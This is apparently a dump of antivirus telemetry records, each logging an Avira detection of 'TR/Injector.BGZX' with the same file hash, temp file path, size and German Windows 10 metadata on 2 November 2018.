  Row(detection=Row(filename='avscan-20181102-054505-6b54cc1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054505-6B54CC1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054749-cd0159c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054749-CD0159C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054717-ba25982f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054717-BA25982F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053945-ad029862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053945-AD029862', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055637-07c4a557', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055637-07C4A557', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052854-28b8141c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052854-28B8141C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053258-b9ff0dba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053258-B9FF0DBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055618-fc820758', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055618-FC820758', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054744-ca628200', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054744-CA628200', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053907-95e96d89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053907-95E96D89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055635-06ee6e9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055635-06EE6E9C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054715-b94473a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054715-B94473A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054752-ced48dfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054752-CED48DFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054530-7ab594d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054530-7AB594D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054511-6f0a0609', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054511-6F0A0609', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055623-ffe348c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055623-FFE348C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054713-b80efe5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054713-B80EFE5F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054600-8c4e0d03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054600-8C4E0D03', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054725-beef9df4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054725-BEEF9DF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055649-0eee73c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055649-0EEE73C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055635-06e70505', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055635-06E70505', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054754-d06d11f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054754-D06D11F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053942-aabd3830', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053942-AABD3830', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052835-1d485ba5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052835-1D485BA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054754-d087ca40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054754-D087CA40', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054756-d14a29a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054756-D14A29A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053931-a480e7f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053931-A480E7F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052852-27b9e2ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052852-27B9E2EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055602-f3687439', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055602-F3687439', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052856-2a31aa48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052856-2A31AA48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053212-9f17c9ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053212-9F17C9EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053950-af9b13cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053950-AF9B13CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053247-b38a19f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053247-B38A19F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054737-c6187ea7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054737-C6187EA7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054717-ba0b9714', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054717-BA0B9714', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060143-be5c5a62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060143-BE5C5A62', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053949-af4b9521', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053949-AF4B9521', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053924-a0478da7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053924-A0478DA7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052852-27b284ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052852-27B284EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060157-c69d7518', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060157-C69D7518', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053908-9682d85b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053908-9682D85B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053947-ae21df5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053947-AE21DF5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053912-996a2413', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053912-996A2413', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055657-143086d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055657-143086D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054705-b350e34e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054705-B350E34E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054714-b8b64391', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054714-B8B64391', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053943-ab75ab6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053943-AB75AB6B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054731-c29b24d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054731-C29B24D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053949-af572d7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053949-AF572D7C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054731-c2bb3ca2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054731-C2BB3CA2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053241-b0307f49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053241-B0307F49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055612-f9428dec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055612-F9428DEC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055630-041dea22', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055630-041DEA22', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055638-08e08ce5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055638-08E08CE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054541-80ecf676', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054541-80ECF676', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:40Z'), dt=datetime.date(2018, 11, 2)),
